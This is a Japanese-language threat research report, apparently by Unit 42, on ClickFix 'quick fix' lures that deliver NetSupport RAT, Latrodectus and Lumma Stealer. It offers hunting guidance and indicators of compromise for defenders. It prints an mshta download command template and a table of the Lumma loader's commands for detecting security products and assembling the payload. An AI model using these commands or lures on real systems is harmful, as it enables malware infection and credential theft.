エグゼクティブ サマリー

この記事では、ClickFixキャンペーンに備えた脅威ハンティングのヒントと緩和策を共有するものです。また2025年に弊社がこれまでに確認した最も著名なClickFixキャンペーンを紹介します。特徴は以下の通りです。

  • リモート アクセス型トロイの木馬(RAT)「NetSupport」を配信する攻撃者が、新たなローダーで活動を活発化させている
  • Latrodectusマルウェアを配信する攻撃者が、新たなClickFixキャンペーンで被害者を誘い込んでいる
  • 新しいテクニックで多業種を狙う「Lumma Stealer」キャンペーンが盛況

ClickFixとは脅威アクターがソーシャル エンジニアリングのルアー(誘い文句)として使用する、近年攻撃者間で人気を集めるテクニックです。この手口は、潜在的な標的を騙して悪意のあるコマンドを実行させるもので、一般的なコンピュータの問題に対する「クイック フィックス(迅速な修正)」を行うものと偽装してこの実行を迫るものです。

このようなキャンペーンは、合法的な製品やサービスの評判を利用することで、その悪質な活動が見破られないように偽装するものであり、実行可能ファイルの作者がマルウェアによって引き起こされた結果について過失や責任を負うことを意味するものではありません。

ClickFixキャンペーンは、以下のようなさまざまな業界の組織に影響を与えてきました。

  • ハイテク
  • 金融サービス
  • 製造業
  • 卸売・小売
  • 州・地方政府
  • 専門・法務サービス
  • 公益事業・エネルギー

Unit42は直近でClickFixのルアーがイニシャル アクセス ベクトルであったインシデント レスポンス案件を10件近く支援しています。

効果的なClickFixのルアー(誘い文句)により、成功時には脅威アクターは標的の組織を完全に乗っ取ることができるとされています。このようなルアーは、脅威アクターにとって準備するのは非常に簡単とされており、組織をクレデンシャル収集、メール窃盗、さらにはランサムウェアのインシデントの影響に対して脆弱にするものです。

このテクニックには以下の2つのバリエーションがあります。

  • Windowsキー+R(Win+R)を押して、ターゲットに「ファイル名を指定して実行」ウィンドウで悪意のあるコマンドを実行するよう指示する。
  • 潜在的な被害者に、Windowsキー+X(Win+X)を押して、ターミナルウィンドウで悪意のあるコマンドを実行するよう指示する。

パロアルトネットワークスのお客様は、以下の製品およびサービスを通じて、ここに記載されている脅威に対する確実な保護を構築いただけます。

情報漏えいの可能性がある場合、または緊急の案件がある場合は、Unit 42インシデント レスポンス チームまでご連絡ください。

Unit 42の関連トピック Social Engineering, Malware, Malvertising

ClickFixのテクニックを解剖

ClickFixのテクニックを検証する前に、ClickFixとは何か、そしてここ数ヶ月でClickFixがどの程度普及したかをよく理解する必要があります。

ClickFixは比較的新しいソーシャル エンジニアリングの手法であり、脅威アクターによって攻撃キャンペーンで使用されることが増えています。この手口は、ターゲットにしたユーザーを惑わし、パフォーマンスの問題やドライバの欠落、ポップアップ エラーなど、一般的なコンピュータの問題に対する「クイックフィックス(迅速な修正)」の適用を促すものです。ここ数ヶ月に確認されたClickFixのテクニックを使ったルアー(誘い文句)の多くは、偽の認証ページに誘導し、閲覧者が意図した目的地に進む前にあるアクションを完了するよう求めるものでした。

脅威アクターは、しばしば以下の媒体に誘い文句を配信しています。

  • 合法だが危険なWebサイト
  • 不正広告
  • YouTubeチュートリアル
  • 偽の技術サポートフォーラム

ClickFixのテクニックはクリップボード ハイジャックに依存します。ClickFixを使用したWebページは、潜在的な標的のクリップボードに悪意のあるスクリプトやコマンドを注入し、悪意のあるコンテンツを貼り付けて実行するよう指示します。ClickFixのテクニックはユーザーにコンテンツの貼り付けを要求するため「ペースト ジャッキング」と呼ばれることもあります。

攻撃者はClickFixの手法を最初の感染経路として使用し、それに続くペイロードは様々です。あるものは情報窃取ツールを忍ばせたり、あるものはRATをデプロイしたり、セキュリティ ツールを無力化したりします。しかし、どれも標的に攻撃者の仕事をさせること、つまりコードを手動で実行させることに依存しているのが特徴です。

この配信方法は、多くの標準的な検出および防止制御を回避することができます。エクスプロイト攻撃やフィッシング添付ファイル、悪意のあるリンクは必要ありません。その代わりに、標的を誘導し、信頼できるシステム シェルを通じて、無意識のうちに自身でコマンドを実行させます。

この方法によって、ClickFixからの感染は、ドライブバイ ダウンロードや従来のマルウェア ドロッパーよりも検出が複雑になります。しかし、研究者はアーチファクトを探すことでこれらの感染を検出することができます。

世界的現象の台頭

弊社ではここ数ヶ月間ClickFixのルアーを注意深く監視し、複数のマルウェア ファミリーを提供する亜種を多数発見しました。図1は、週ごとのケース配信を示したものです。

2024-12-30から2025-05-12までの週ごとのイベント数を示す棒グラフ。イベント数は最低1件から最高126件まで。主なピークは2025-01-27の121件と2025-03-24の126件。
図1.2025年初頭からの週間感染数。

また、図2に示すように、ClickFixが様々な業種に影響を及ぼしていることも分かりました。

業種別の事業体数を示す棒グラフ。業種は多いものから並べて以下のようになっている。ハイテク, 金融サービス, 製造業, 卸売・小売業, 州・地方政府, 専門職・法律サービス, 公共事業・エネルギー, 製薬・ライフ サイエンス, ホスピタリティ, テレコミュニケーション, ヘルスケア, 連邦政府, 教育。パロアルトネットワークスとUnit 42のロゴがロックアップ。
図2.ClickFixのルアーによって影響を受ける業界の分布。

ケーススタディ

2025年に私たちがこれまでに観測した最も顕著な3つのキャンペーンは、脅威アクターがClickFixを様々なマルウェア ファミリーの攻撃フローにどのように組み込んでいるかを示しています。

NetSupport RATがローディングを変更

ClickFix関連の活動調査を通して、2025年5月に活発に行われたキャンペーンを特定しました。このキャンペーンにおいて、NetSupport RATを使用した攻撃者は、以下のような様々な業界に影響を与えています。

  • ヘルスケア
  • 法的サービス
  • 情報通信
  • 小売
  • 鉱業

NetSupport RATを配信するこのClickFixキャンペーンは、以下のような正規の人気サービスを装った配信ドメインを利用しています。

  • DocuSign: 文書を電子的に署名、送信、管理するためのデジタル プラットフォーム。
  • Okta: 企業がアプリケーションやシステムへのユーザー アクセスを管理し、保護するためのプラットフォーム。シングル サインオン(SSO)、多要素認証、ID管理サービスを提供している。

脅威アクターはしばしば、その悪意のある目的のために正規の製品を悪用したり、利用したり、破壊したりしますが、これは正規品に欠陥や悪意があることを意味するものではありません。

図3と図4は、偽のDocuSignとOktaのランディングページです。

PandaDocのなりすましランディング ページ。様々な業界のバッジや信頼できるブランドのロゴを使用し、簡単さと費用対効果を強調した文書署名の代替案について説明している。
図3.docusign.sa[.]comにあるDocuSignの偽のランディング ページ。
「Verify you are human(あなたが人間であることを確認してください)」と書かれたチェックボックスと、その下にCloudflareのロゴが表示された、なりすましのセキュリティ認証ページのスクリーンショット。テキストはサイトが先に進む前に接続のセキュリティを確認する必要があることを説明している。
図4.oktacheck.it[]comにあるOktaの偽ランディングページ。
弊社では、このClickFixキャンペーンはClearFakeインフラ上でNetSupport RATを配信していると疑っています。この推察はClickFixのルアー(誘い文句)とClearFakeのインフラの類似性に基づくものであり、どちらも同じロシア語コメントを含み、同じJavaScriptのクリップボード インジェクション機能を使用しています。

ClearFakeは、他のマルウェアが使用するドライブバイ ダウンロード キャンペーンの一環として、侵害されたWebサイト上にデプロイされる悪意のあるJavaScriptフレームワークです。図5は、JavaScript関数unsecuredCopyToClipboardを使ってエンコードされたPowerShellコマンドを注入するClearFakeを示したものです。コード内のロシア語のコメントも示されており、ClearFake開発者の出自を示唆する手がかりとなっています。

スクリーンショットは2つに分割され、左側が検証ステップ、右側がコンピューターコードを示している。左側には、オレンジ色のインターフェイスが表示され、ウィンドウズキーとRキーを押しながらEnterキーを押すなど、検証ステップを完了するよう指示している。これが最初のステップ。右側は、PowerShellコマンドの修正を示す赤と黒のコード行とロシア語のメモがあるコーディング インターフェース。ステップ2では、難読化されたPowerShellコマンドがユーザーのキーボードに注入されている。
図5.偽DocuSignページのランディング ページとスクリプト インジェクション。

偽の検証ウィンドウは「ファイル名を指定して実行」ダイアログを開き、クリップボードの内容を貼り付ける指示を表示しています。しかしインターフェイスはこれらの指示を、ユーザーが人間であることを証明するテストとして提示しています。標的はWebサイトがその後注入する悪意のあるPowerShellコマンドに気づかない可能性があります(前述のように、これはpastejackingの例です)。

実行されると、コマンドは別のPowerShellスクリプトをダウンロードし、攻撃の次の段階をダウンロードして実行します。この感染チェーンを図6に示します。

偽のOkta Webサイトのプロンプト、Cmd.exeの実行、および PowerShellを使用したサイバー攻撃により、NetSupport RAT やさまざまな実行可能ファイルを含む悪意のあるソフトウェアがダウンロードおよび実行され、データのインジェクションと流出に至ったことを示すフローチャート。
図6.NetSupport RATの感染チェーン。

次のステージは、ZIPアーカイブ内に含まれています。これはjp2launcher.exeを実行するために必要なすべての合法的な依存関係を含むものです。このファイルは、図7が示すように、Javaアプリケーションの起動に使用される正規のJava Runtime Environment(JRE)コンポーネントです。

主にMicrosoft Windowsのコンポーネントとアプリケーションに関連するファイルのリストを表示するコンピュータの画面のスクリーンショット。各ファイルのエントリには、ファイル名、更新日、タイプ、サイズが表示されている。3つの行が赤枠でハイライトされている。
図7.cmd.exeによってダウンロードされたZIPアーカイブの内容。

まず、cmd.exeがZIPアーカイブをダウンロードし、その内容を解凍して%APPDATA%/Local/Temp/directoryディレクトリに保存します。その後、cmd.exeはjp2launcher.exeを起動し、msvcp140.dllという悪意のあるローダーをサイドロードします。本記事の付録では、新しいDLLベースのNetSupport RATローダーの完全な技術分析を提供しています

最後に、DLLはNetSupport RAT (client32.exe)と関連ファイルを含むZIPアーカイブをダウンロードして実行します。NetSupport RATは元は合法的なソフトウェアですが、古いコピーや盗用されたコピーがさまざまな脅威アクターによって悪用されることが多く、通常は侵入やエンドポイント感染のためのRATとして構成されています。

Latrodectus、ClickFixの新作ルアーを紡ぐ

2025年3月から4月にかけて、弊社の調査チームはLatrodectusが管理するドメインへのトラフィックが増加していることに気づきました。また、Latrodectusを配信する攻撃者が、イニシャル アクセス ベクターにClickFixのテクニックを使い始めたことから、その感染戦略にも変化が見られました。

Latrodectus攻撃の連鎖は、標的が、正規の、しかし侵害されたWebサイトを訪問したときに始まります。その後、ClearFakeインフラストラクチャは、サイト訪問者を偽の検証ページにリダイレクトします。このページでは、「ファイル名を指定して実行」ダイアログを使ってコマンドを実行するよう指示するプロンプトが表示され、悪意のあるJavaScriptバックエンドがエンドポイントのクリップボードにPowerShellコマンドをインジェクションします。

以下の図8は、侵害されたサイトからのルアーとそれに続くリダイレクト チェーンを示したものです。

キーボード ショートカットを使ってステップを完了するよう指示するキャプチャ認証ページを表示するコンピュータ画面のスクリーンショット。画面には、ブラウザで開いているウェブ開発ツールも表示され、さまざまなスクリプト名が見える。
図8.Latrodectus ClickFix lure。

被害者が注入されたコマンドを貼り付けて実行しても、コマンドそのものは表示されません。表示されるのは、スクリプトの最後のコメント(Cloud Identificator: 2031)で、これは通常の認証プロセスの一部のように見えるものです。しかし、このスクリプトを実行すると、curl.exeを使用してコマンド&コントロール(C2)サーバーからJavaScriptファイルがダウンロードされます。そして、図9が示すように、Cscriptを介してファイルの実行が行われます。

ダークモードでのシンタックス ハイライトによるコードスニペット。
図9.ClickFixのルアーから悪意のあるコマンドがターゲットのクリップボードに注入されている。

2024年半ばに出現して以来、攻撃者は、LatrodectusをドロップするMicrosoftソフトウェア インストーラー(MSI)ファイルをダウンロードする悪意のあるJavaScriptファイルを含むチェーンを通じて、Latrodectusを頻繁に配信しています。この場合、実行されたJavaScriptファイル(la.txt)は、リモートサーバーからMSIファイルを取得し、msiexec.exeを使って実行します。

JavaScriptダウンローダーが一般的に肥大化し、無意味なコメントで難読化されていた以前のキャンペーンとは異なり、この亜種はvar_Apple_Palantir38func_Slack_encryption84など、一見正当な名前を持つ大きなジャンクJSON変数を使用していることが特徴です。図10は、過去と最近のLatrodectusキャンペーンで使用された難読化テクニックを比較したものです。

左は変数と関数を含むコード スニペット、右はループと条件文を含むコード ブロック。
図10:Latrodectusドロッパーで使用されている最近の難読化技術(左)と過去の難読化技術(右)の比較。

MSIペイロードは標的のディスクに複数のファイルをドロップします。これらには、悪意のあるDLLファイル(libcef.dll)としてドロップされるLatrodectusとDLLをサイドロードする正規のバイナリが含まれます。図11はこれを図解したものです。

Latrodectus感染チェーンの図。侵害された正規のウェブサイトから始まり、ClickFixの手口を経て、EXEファイルと悪意のあるシェルコードのダウンロードと実行に至る。
図11.Latrodectusの感染チェーン。

正規のファイルがLatrodectus用の悪意のあるDLLをサイドロードすると、それ自体にシェルコードを注入します。

2025年5月のタイムリーな脅威インテリジェンスでは、弊社チームがLumma Stealerが攻撃チェーンの最終ペイロードであった同様のLatrodectusキャンペーンを分析しています。

Lumma Stealerタイポスクワッティング キャンペーン

Lumma Stealerを配信する攻撃者がClickFixの感染テクニックを使い始めたのは2024年後半のことですが、2025年4月の時点で、Lumma Stealerに対するClickFix感染の試みが急増していることが確認されています。最近のキャンペーンでは、Lumma Stealerを配信する攻撃者によって以下のような幅広い分野に影響が出ています。

  • 自動産業
  • エネルギー
  • IT
  • ソフトウェア

このようなClickFixキャンペーンを調査したところ、ターゲットに「mshta xxxx[.]co/xxxxxx =++xxxxx」のような構造のMSHTAコマンドをコピーさせることが判明しました。

攻撃者は各ターゲットに特定の識別子文字列を与え、それを使って一度だけペイロードを受け取ることができるとされています。しかし、弊社の研究者がチェックしたURLでは、感染後、もはやペイロードを配信していませんでした。

ClickFixスクリプトを実行すると、スクリプトはIP Loggerドメインiplogger[.]orgとiplogger[.]comタイポスクワットバージョンにビューアをリダイレクトします。IP LoggerはURL短縮とIPトラッキング サービスであり、リンクを作成し、訪問者に関する以下のような情報を記録します。

  • IPアドレス
  • 地理的位置
  • デバイスの詳細
  • 閲覧行動

攻撃者がコントロールするタイポスクワット ドメインはiplogger[.]coとされ、このドメイン ページは既知の正当なサービスに偽装されています。

このキャンペーンでは、MSHTAコマンドが暗号化されたPowerShellスクリプトをダウンロードし、Lumma Stealerの感染を開始することが確認されています。図12は、感染チェーン全体を示したものです。

Lumma Stealer感染は、ClickFix、Encode PowerShell、Lumma Stealerなどのエンティティや、コマンド アンド コントロール(C2)サーバーとの連絡、実行可能ファイルの構築、セキュリティ製品の検出など、さまざまな機能を含むマルウェア攻撃のプロセスを描写しています。このチャートは、攻撃のライフサイクル全体を通しての接続と、リソースのドロップや実行コマンドなどのアクションを示している。
図12.Lumma Stealer感染チェーン。

攻撃者が制御する各リンクは、高度に難読化されBase64エンコードされたPowerShellコマンドをホストし、最終的にPartyContinued.exeという悪意のあるLumma Stealerステージャをドロップして実行させます。この実行ファイルはhxxps[:]//pub-<dynamically generated number string>.r2[.]devでホストされており、正当な開発者のURLのように見えるように名付けられています。

PartyContinued.exeが起動すると、スクリプト言語AutoItを使用する新しいLummaローディング メソッドがセットアップされます。このバージョンのLumma Stealerは以前のバージョンと似ていますが、Boat.pstという新しいMicrosoftキャビネット アーカイブ(CAB)ファイルが含まれています。このCABファイルはPartyContinued.exeの中にバンドルされ、AutoIt3スクリプトエンジンとLumma Stealerのために実行するAutoItスクリプトを作成するために使用される残りのコンテンツを保持します。

表1は、ローダーが実行するコマンドとその目的をまとめたものです

コマンド 内容 目的
tasklist | findstr /I "opssvc wrsa" 実行中のプロセスの名前から、大文字と小文字を区別せずにopssvcまたはwrsaを検索する。 エンドポイント セキュリティ ソフトウェアの検出
tasklist | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn" 実行中のプロセスから様々な文字列を検索する。 エンドポイント セキュリティ ソフトウェアの検出
cmd /c md 386354 マルウェアをディスクに保存するためのディレクトリを作成する。 ペイロードを取り出す場所を設定する
extrac32 /Y /E Boat.pst Boat.pstという名前の.cabファイルからファイルを抽出し、既存のファイルを上書き(/Y)し、すべてのファイルを抽出(/E)する。 ペイロードの取り出し
set /p ="MZ" > 386354\Slovenia[.]com <nul 386354ディレクトリの下にSlovenia[.]comという名前のファイルを作成する。 AutoIt3エクゼキューターを構築する
findstr /V "Tr" Bell >> 386354\Slovenia[.]com 抽出されたBellという名前のファイルの中で、Trという文字列(大文字と小文字を区別)を含まないすべての行をSlovenia[.]comというファイルに追加する。 AutoIt3エクゼキューターを構築する
cmd /c copy /b 386354\Slovenia[.]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\Slovenia[.]com copy /bを使ってバイナリファイルを作成する際に、抽出した他のファイルを追加する。その結果AutoIt3.exeのコピーはSlovenia[.]comという名前になります。 AutoIt3エクゼキューターを構築する
cmd /c copy /b ..\Presently.pst + ..\Instantly.pst + ..\Roy.pst + ..\Tolerance.pst + ..\Mailto.pst + ..\Marco.pst + ..\Mint.pst G Slovenia[.]comがAutoIt v3コンパイル スクリプト(.a3x)として実行するGという名前のバイナリを作成する。 Lumma Stealerのペイロードを構築する(.a3xファイルとしてバイナリを実行)
start Slovenia[.]com G Lumma Stealerのバイナリを.a3xファイルとして実行するためのAutoIt3実行コマンド。 Lumma Stealerをロードして実行する
choice /d y /t 5 .batファイル内のコマンドを5秒待ってから実行する(/t 5)ためのデフォルトオプション(/d)に対して、はい(y)を選択するコマンド。 ユーザーの操作なしでLumma Stealerを実行可能にする

表1.Lumma Stealerのローダーが実行するコマンド。

表にあるように、Slovenia[.]comはAutoIt3スクリプト エンジンAutoIt3.exeのコピーであり、Gという名前のAutoItスクリプト(.a3x)として実行されるバイナリを実行し、攻撃の次の段階を担当します。このバージョンのLatrodectusは、Chromiumベースのブラウザのパスワードを含む機密情報を取得し、sumeriavgv[.]digitalにあるC2サーバーへの流出を試みます。

ClickFix感染の脅威ハンティング

ClickFix攻撃は、容易に検出可能な痕跡を残すことが多く、特にこのようなルアー(誘い文句)を見た人々が管理者用インターフェースを開くことに慣れていない場合、悪意のあるコマンド文字列を実行ウィンドウに貼り付ける可能性が高くなります。

RunMRUアーティファクトのレビュー

Windowsは、「ファイル名を指定して実行」ウィンドウ(Win + R)から最近実行されたコマンドを保存するレジストリ キーを保持しており、これをRunMRUと呼びます。

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

このレジストリキーは、「ファイル名を指定して実行」ウィンドウから実行されたコマンドを保存し、アナリストがこれらのエントリを解析して不審な使い方の兆候を探すことを可能にするものです。

不審なRunMRUの内容に関するいくつかの重要な指標は以下の通りです。

  • 難読化されたコンテンツ
  • 未知のドメインや不審なドメインからのペイロードのダウンロードや実行に関連するキーワード
  • 管理インターフェイスへの呼び出しを示すキーワード

これらのエントリーは、誰かがこのようなコマンドを手動で実行した可能性を示唆するもので、ClickFixの感染フローと一致しています。

Win + X ClickFixの検出

一部の攻撃者は、RunMRUレジストリ キーでの活動の露呈を避けることを目的としており、クイック アクセス メニューのWin+XでPowerShell(Windows 11)用のターミナル、またはコマンド プロンプト(Windows 10)を起動する手順を代わりに使用しています。2025年3月の報告では、Havocを配信している攻撃者が、このWin+XのClickFixのバリエーションを使用していたことが明らかになっています。

脅威ハンターは、EDRテレメトリーやWindowsイベントログを活用することで、このWin+X ClickFixテクニックの兆候を探すことができます。

  • セキュリティ イベントID4688(プロセス作成): Explorer.exeによって生成されたpowershell.exeを、%LocalAppData%MicrosoftWindowsWinXフォルダ下のファイルのイベントID4663(Object Access)と関連付けて検索します。
  • シェルの使用パターン: 対話型ログインの直後に起動される昇格したPowerShellセッション、それに続くネットワーク接続や不審な子プロセス(certutil.exe、mshta.exe、rundll32.exeなど)は、しばしば危険なサインとされます。
  • クリップボードの監視: ClickFixは、標的がクリップボードから悪意のあるコンテンツをペーストすることに依存しているため、ユーザーがWin+Xをタイプした直後のPowerShellの実行とペーストのアクティビティを関連付けることができます。

結論

ClickFixという手法は、ダイナミックにその手法を変えながら、脅威を増しています。脅威アクターはClickFixを組織に対する攻撃に活用し、脅威の拡散と持続のために人為的ミスを悪用します。

この記事では、NetSupport RAT、Latrodectus、Lumma Stealerの3つの著名なClickFixキャンペーンを調査しました。

ClickFixのルアー(誘い文句)を発見し検出するための実践的な方法として、EDRテレメトリーやWindowsイベント ログから疑わしいイベント、アクティビティ、パターンを調査することが可能です。

この進化する脅威に積極的に対処することは、組織の継続的なセキュリティにとって不可欠とされています。そのためには、ClickFixのルアーに注意するよう従業員を教育し、意識を高める取り組みが求められます。これは弊社が提案する脅威ハンティングに基づいた防御策や監視策を設定するのと平行して行われる必要があります。

パロアルトネットワークスのお客様は、以下の製品を通じて、上記の脅威に対する確実な保護を構築いただけます。

  • Advanced WildFire
  • Advanced URL FilteringAdvanced DNS Securityは、悪意のあるJavaScriptによってクリップボードのバッファに注入された悪意のあるコマンドを検出することで、このブログで取り上げたようなClickFix攻撃をオフライン セキュリティのWebクローラで検出することができます
  • Cortex XDRXSIAMは、振る舞い脅威防御モジュールを通じて、本記事で取り上げたすべてのキャンペーンとマルウェアを防止することが可能です

情報漏えいの可能性がある場合、または緊急の案件がある場合は、Unit 42インシデント レスポンス チームまでご連絡ください。

  • 北米:フリーダイヤル: +1 (866) 486-4842 (866.4.UNIT42)
  • 英国: +44.20.3743.3660
  • ヨーロッパおよび中東: +31.20.299.3130
  • アジア: +65.6983.8730
  • 日本: +81.50.1790.0200
  • オーストラリア: +61.2.4062.7950
  • インド: 00080005045107

パロアルトネットワークスは、本調査結果をサイバー脅威アライアンス(CTA)のメンバーと共有しています。CTAの会員は、この情報を利用して、その顧客に対して迅速に保護を提供し、悪意のあるサイバー アクターを組織的に妨害しています。サイバー脅威アライアンスについて詳細を見る。

侵害のインジケーター

Lumma Stealerの例からのSHA256ハッシュ

  • Filename PartyContinued.exe:2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
  • Filename Boat.pst (a CAB file):06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

Lumma Stealerのドメイン取得例

  • iplogger[.]co
  • stuffgull[.]top
  • sumeriavgv[.]digital
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev
  • pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev
  • pub-a5a2932dc7f143499b865f8580102688.r2[.]dev
  • pub-7efc089d5da740a994d1472af48fc689.r2[.]dev
  • agroeconb[.]live
  • animatcxju[.]live

LatrodectusのSHA256ハッシュ例

  • Filename libcef.dll:5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
  • PowerShellダウンローダー: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
  • JavaScriptダウンローダー: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
  • JavaScriptダウンローダー: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

LatrodectusのC2 URL例

  • hxxps[:]//webbs[.]live/on/
  • hxxps[:]//diab[.]live/up/
  • hxxps[:]//mhbr[.]live/do/
  • hxxps[:]//decr[.]live/j/
  • hxxps[:]//lexip[.]live/n/
  • hxxps[:]//rimz[.]live/u/
  • hxxps[:]//byjs[.]live/v/
  • hxxps[:]//btco[.]live/r/
  • hxxps[:]//izan[.]live/r/
  • hxxps[:]//k.veuwb[.]live/234
  • hxxps[:]//r.netluc[.]live
  • heyues[.]live
  • hxxps[:]//k.mailam[.]live/234234

NetSupport RATからのSHA256ハッシュ例

  • Filename data_3.bin (XOR encrypted stager):5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
  • Filename data_4.bin (XOR encrypted shellcode):9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
  • Filename msvcp140.dll (loader):CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
  • NetSupport ローダー ミュテックス:
    nx0kFgSPY8SDVhOMjmNgW
  • libsqlite3-0.dll:506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
  • ファイル ロケーション C:◆ProgramData◆SecurityCheck◆v1◆client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

NetSupport RATからのローダー用ドメイン例:

  • oktacheck.it[.]com
  • doccsign.it[.]com
  • docusign.sa[.]com
  • dosign.it[.]com
  • loyalcompany[.]net
  • leocompany[.]org
  • 80.77.23[.]48
  • mhousecreative[.]com

NetSupport RATのC2ドメイン例:

  • mh-sns[.]com
  • lasix20[.]com

その他の資料

付録: 新しいNetSupport RATローダーのテクニカル分析

このセクションでは、DLL ベースの新しいNetSupport RAT ローダーについて掘り下げます。過去には、NetSupport RATは比較的短い感染チェーンを持つスクリプトローダーによってロードされましたが、このローダーは攻撃にステルス性と複雑性のレベルを追加するものです。

ここで分析するのはmsvcp140.dllです。このDLLファイルは、jp2launcher.exeという正規の実行ファイルによってサイドロードされます。

このDLLは、分析を妨げるために、次のようないくつかのテクニックを使っています。

  • ダイナミックAPIリゾルビング
  • データの暗号化
  • コードの難読化

例えば、jp2launcher.exeによってサイドロードされた後、DLLはスタックに次のステージのコードをバイトごとに書き込みます。この後、難読化を解除してコードを実行します。

最初の難読化解除後、DLLはcurl.exeを介してC2サーバーからdata_3.bindata_4.binという暗号化されたバイナリを取得し、同じ作業ディレクトリのディスクにペイロードをドロップします。図13は、ペイロードの1つをダウンロードするcurl.exeコマンドの構成を示したものです。

movやpushなど様々なコマンドをシンタックス ハイライトで表示したHTMLのスクリーンショット。
図13.悪意のあるmsvcp140.dllローダーは、x64dbgデバッガーに表示される.binファイルをダウンロードするcurlコマンドを構築します。

ローダーはdata_3.bindata_4.binの両方を暗号化されたバイナリとしてディスクに保存し、https://google[.]com/であるローリングXORキーを使用してメモリ内で復号化します。そしてローダーは、復号化したコードをjp2launcher.exeの子プロセスに注入します。

data_4.binから復号化されたコードは、data_3.binから復号化されたコードをロードする比較的小さなシェルコードです。このバイナリは完全に形成されたPEであり、最終的なNetSupport RATパッケージを攻撃者のC2サーバーからZIPアーカイブとしてダウンロードし、メモリ内で解凍します。図14は「hxxp[:]//80.77.23[.]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4」へのローダーのリクエストを示すものです。リクエストは一意のユーザー エージェントを含んでいます。

タイムスタンプ付きのHTTPサーバー リクエストとサーバーの応答を詳細に記録したコンピューター ログのスクリーンショット。
図14.C2からのjp2launcher.exeのダウンロード要求、client32.exeのダウンロード。

最終的なペイロードは、NetSupport RATとその必要な依存関係をすべて含むZIPアーカイブです。ローダーはNetSupport RATをC:\ProgramData\SecurityCheck_v1\ にドロップし、そのメインバイナリであるclient32.exeを実行します。

そしてローダーは、ユーザーがログインするたびにclient32.exeを実行するスケジュールタスクを作成することで、RATの永続性を確保します。

ローダーを静的に分析する過程で、弊社はこのDLLがMsiShellツールのあるシリーズの一部であることを示す、ユニークなPDBパスに気づきました。この道筋をたどっていくと、もうひとつのキャンペーンを見つけました。このケースでは、合法的なファイル転送ソフトウェアであるfilezilla.exeを使用し、ローダーの別のバージョンであるlibsqlite3-0.dllをサイドロードするものでした。図15は、2つのローダー バージョンのPDBパスの類似性を示したものです。

ソフトウェアプロジェクトのファイルパスとGUIDを示す2つのスクリーンショット(いずれもデバッグ アーティファクト)。各項目は赤くハイライトされている。
図15.NetSupport RATローダー両バージョンのPDBパス。
Enlarged Image